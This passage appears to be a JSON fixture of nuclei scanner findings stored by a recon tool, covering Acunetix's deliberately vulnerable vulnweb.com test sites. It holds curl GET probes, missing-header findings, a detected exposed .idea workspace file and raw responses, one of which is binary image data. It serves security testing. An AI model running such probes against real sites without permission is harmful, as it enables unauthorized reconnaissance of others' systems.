can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1009, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:51.744Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1010, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:52.008Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1011, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/exposures/files/idea-folder-exposure.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/idea-folder-exposure", + "template_id": "idea-folder-exposure", + "matcher_name": "", + "name": "Public .idea Folder containing files with sensitive data", + "severity": 0, + "description": "Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62' 'http://testphp.vulnweb.com/.idea/workspace.xml'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/workspace.xml", + "discovered_date": "2024-11-13T02:42:52.291Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/workspace.xml HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 12473\r\nAccept-Ranges: bytes\r\nContent-Type: text/xml\r\nDate: Wed, 13 Nov 2024 02:42:48 GMT\r\nEtag: "4f911ceb-30b9"\r\nLast-Modified: Fri, 20 Apr 2012 08:23:07 GMT\r\nServer: nginx/1.19.0\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<project version="4">\r\n <component name="ChangeListManager">\r\n <list default="true" id="190e5f86-a42c-4cc9-a03a-80ac0d47d6d2" name="Default" comment="" />\r\n <ignored path="acuart.iws" />\r\n <ignored path=".idea/workspace.xml" />\r\n <option name="TRACKING_ENABLED" value="true" />\r\n <option name="SHOW_DIALOG" value="false" />\r\n <option name="HIGHLIGHT_CONFLICTS" value="true" />\r\n <option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />\r\n <option name="LAST_RESOLUTION" value="IGNORE" />\r\n </component>\r\n <component name="ChangesViewManager" flattened_view="true" show_ignored="false" />\r\n <component name="CreatePatchCommitExecutor">\r\n <option name="PATCH_PATH" value="" />\r\n </component>\r\n <component name="DaemonCodeAnalyzer">\r\n <disable_hints />\r\n </component>\r\n <component name="FavoritesManager">\r\n <favorites_list name="acuart" />\r\n </component>\r\n <component name="FileEditorManager">\r\n <leaf>\r\n <file leaf-file-name="cart.php" pinned="false" current="true" current-in-tab="true">\r\n <entry file="file://$PROJECT_DIR$/cart.php">\r\n <provider selected="true" editor-type-id="text-editor">\r\n <state line="60" column="26" selection-start="2336" selection-end="2336" vertical-scroll-proportion="-0.41645244">\r\n <folding>\r\n <marker date="1334906567000" expanded="true" signature="3702:3950" placeholder="..." />\r\n <marker date="1334906567000" expanded="true" signature="4948:5056" placeholder="..." />\r\n </folding>\r\n </state>\r\n </provider>\r\n </entry>\r\n </file>\r\n </leaf>\r\n </component>\r\n <component name="Git.Settings">\r\n <option name="CHECKOUT_INCLUDE_TAGS" value="false" />\r\n <option name="UPDATE_CHANGES_POLICY" value="STASH" />\r\n <option name="LINE_SEPARATORS_CONVERSION" value="ASK" />\r\n </component>\r\n <component name="IdeDocumentHistory">\r\n <option name="changedFiles">\r\n <list>\r\n <option value="$PROJECT_DIR$/.htaccess" />\r\n <option value="$PROJECT_DIR$/cart.php" />\r\n </list>\r\n </option>\r\n </component>\r\n <component name="PhpWorkspaceProjectConfiguration" backward_compatibility_performed="true" />\r\n <component name="ProjectFrameBounds">\r\n <option name="x" value="-8" />\r\n <option name="y" value="-8" />\r\n <option name="width" value="1296" />\r\n <option name="height" value="1000" />\r\n </component>\r\n <component name="ProjectLevelVcsManager" settingsEditedManually="false">\r\n <OptionsSetting value="true" id="Add" />\r\n <OptionsSetting value="true" id="Remove" />\r\n <OptionsSetting value="true" id="Checkout" />\r\n <OptionsSetting value="true" id="Update" />\r\n <OptionsSetting value="true" id="Status" />\r\n <OptionsSetting value="true" id="Edit" />\r\n <ConfirmationsSetting value="0" id="Add" />\r\n <ConfirmationsSetting value="0" id="Remove" />\r\n </component>\r\n <component name="ProjectReloadState">\r\n <option name="STATE" value="0" />\r\n </component>\r\n <component name="ProjectView">\r\n <navigator currentView="ProjectPane" proportions="" version="1" splitterProportion="0.5">\r\n <flattenPackages />\r\n <showMembers />\r\n <showModules />\r\n <showLibraryContents ProjectPane="true" />\r\n <hideEmptyPackages />\r\n <abbreviatePackageNames />\r\n <autoscrollToSource />\r\n <autoscrollFromSource />\r\n <sortByType />\r\n </navigator>\r\n <panes>\r\n <pane id="ProjectPane">\r\n <subPane>\r\n <PATH>\r\n <PATH_ELEMENT>\r\n <option name="myItemId" value="acuart" />\r\n <option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />\r\n </PATH_ELEMENT>\r\n </PATH>\r\n <PATH>\r\n <PATH_ELEMENT>\r\n <option name="myItemId" value="acuart" />\r\n <option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />\r\n </PATH_ELEMENT>\r\n <PATH_ELEMENT>\r\n <option name="myItemId" value="acuart" />\r\n <option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />\r\n </PATH_ELEMENT>\r\n </PATH>\r\n </subPane>\r\n </pane>\r\n <pane id="Scope" />\r\n </panes>\r\n </component>\r\n <component name="PropertiesComponent">\r\n <property name="WebServerToolWindowFactoryState" value="false" />\r\n </component>\r\n <component name="RunManager">\r\n <list size="0" />\r\n </component>\r\n <component name="ShelveChangesManager" show_recycled="false" />\r\n <component name="TaskManager">\r\n <task active="true" id="Default" summary="Default task">\r\n <created>1334906472656</created>\r\n <updated>1334906472656</updated>\r\n </task>\r\n <servers />\r\n </component>\r\n <component name="ToolWindowManager">\r\n <frame x="-8" y="-8" width="1296" height="1000" extended-state="6" />\r\n <editor active="true" />\r\n <layout>\r\n <window_info id="Data Sources" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="-1" side_tool="false" content_ui="tabs" />\r\n <window_info id="Changes" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="-1" side_tool="false" content_ui="tabs" />\r\n <window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs" />\r\n <window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.25" sideWeight="0.5" order="1" side_tool="true" content_ui="tabs" />\r\n <window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="true" weight="0.20373377" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />\r\n <window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.4" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />\r\n <window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="-1" side_tool="true" content_ui="tabs" />\r\n <window_info id="Event Log" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="-1" side_tool="true" content_ui="tabs" />\r\n <window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="2" side_tool="false" content_ui="tabs" />\r\n <window_info id="Version Control" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="-1" side_tool="false" content_ui="tabs" />\r\n <window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs" />\r\n <window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />\r\n <window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.33" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />\r\n <window_info id="Ant Build" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />\r\n <window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />\r\n <window_info id="Inspection" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.4" sideWeight="0.5" order="5" side_tool="false" content_ui="tabs" />\r\n <window_info id="Hierarchy" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" weight="0.25" sideWeight="0.5" order="2" side_tool="false" content_ui="combo" />\r\n </layout>\r\n </component>\r\n <component name="VcsContentAnnotationSettings">\r\n <option name="myLimit" value="2678400000" />\r\n </component>\r\n <component name="VcsManagerConfiguration">\r\n <option name="OFFER_MOVE_TO_ANOTHER_CHANGELIST_ON_PARTIAL_COMMIT" value="true" />\r\n <option name="CHECK_CODE_SMELLS_BEFORE_PROJECT_COMMIT" value="true" />\r\n <option name="CHECK_NEW_TODO" value="true" />\r\n <option name="myTodoPanelSettings">\r\n <value>\r\n <are-packages-shown value="false" />\r\n <are-modules-shown value="false" />\r\n <flatten-packages value="false" />\r\n <is-autoscroll-to-source value="false" />\r\n </value>\r\n </option>\r\n <option name="PERFORM_UPDATE_IN_BACKGROUND" value="true" />\r\n <option name="PERFORM_COMMIT_IN_BACKGROUND" value="true" />\r\n <option name="PERFORM_EDIT_IN_BACKGROUND" value="true" />\r\n <option name="PERFORM_CHECKOUT_IN_BACKGROUND" value="true" />\r\n <option name="PERFORM_ADD_REMOVE_IN_BACKGROUND" value="true" />\r\n <option name="PERFORM_ROLLBACK_IN_BACKGROUND" value="false" />\r\n <option name="CHECK_LOCALLY_CHANGED_CONFLICTS_IN_BACKGROUND" value="false" />\r\n <option name="ENABLE_BACKGROUND_PROCESSES" value="false" />\r\n <option name="CHANGED_ON_SERVER_INTERVAL" value="60" />\r\n <option name="SHOW_ONLY_CHANGED_IN_SELECTION_DIFF" value="true" />\r\n <option name="CHECK_COMMIT_MESSAGE_SPELLING" value="true" />\r\n <option name="DEFAULT_PATCH_EXTENSION" value="patch" />\r\n <option name="SHORT_DIFF_HORISONTALLY" value="true" />\r\n <option name="SHORT_DIFF_EXTRA_LINES" value="2" />\r\n <option name="SOFT_WRAPS_IN_SHORT_DIFF" value="true" />\r\n <option name="INCLUDE_TEXT_INTO_PATCH" value="false" />\r\n <option name="INCLUDE_TEXT_INTO_SHELF" value="false" />\r\n <option name="CREATE_PATCH_EXPAND_DETAILS_DEFAULT" value="true" />\r\n <option name="FORCE_NON_EMPTY_COMMENT" value="false" />\r\n <option name="LAST_COMMIT_MESSAGE" />\r\n <option name="MAKE_NEW_CHANGELIST_ACTIVE" value="true" />\r\n <option name="OPTIMIZE_IMPORTS_BEFORE_PROJECT_COMMIT" value="false" />\r\n <option name="CHECK_FILES_UP_TO_DATE_BEFORE_COMMIT" value="false" />\r\n <option name="REFORMAT_BEFORE_PROJECT_COMMIT" value="false" />\r\n <option name="REFORMAT_BEFORE_FILE_COMMIT" value="false" />\r\n <option name="FILE_HISTORY_DIALOG_COMMENTS_SPLITTER_PROPORTION" value="0.8" />\r\n <option name="FILE_HISTORY_DIALOG_SPLITTER_PROPORTION" value="0.5" />\r\n <option name="ACTIVE_VCS_NAME" />\r\n <option name="UPDATE_GROUP_BY_PACKAGES" value="false" />\r\n <option name="UPDATE_GROUP_BY_CHANGELIST" value="false" />\r\n <option name="SHOW_FILE_HISTORY_AS_TREE" value="false" />\r\n <option name="FILE_HISTORY_SPLITTER_PROPORTION" value="0.6" />\r\n </component>\r\n <component name="XDebuggerManager">\r\n <breakpoint-manager />\r\n </component>\r\n <component name="editorHistoryManager">\r\n <entry file="file://$PROJECT_DIR$/.htaccess">\r\n <provider selected="true" editor-type-id="text-editor">\r\n <state line="6" column="0" selection-start="213" selection-end="222" vertical-scroll-proportion="0.124847">\r\n <folding />\r\n </state>\r\n </provider>\r\n </entry>\r\n <entry file="file://$PROJECT_DIR$/cart.php">\r\n <provider selected="true" editor-type-id="text-editor">\r\n <state line="60" column="26" selection-start="2336" selection-end="2336" vertical-scroll-proportion="-0.41645244">\r\n <folding>\r\n <marker date="1334906567000" expanded="true" signature="3702:3950" placeholder="..." />\r\n <marker date="1334906567000" expanded="true" signature="4948:5056" placeholder="..." />\r\n </folding>\r\n </state>\r\n </provider>\r\n </entry>\r\n </component>\r\n</project>\r\n\r\n", + "is_llm_used": false, + "tags": [ + 29, + 30, + 31, + 13, + 32 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1012, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:52.614Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019l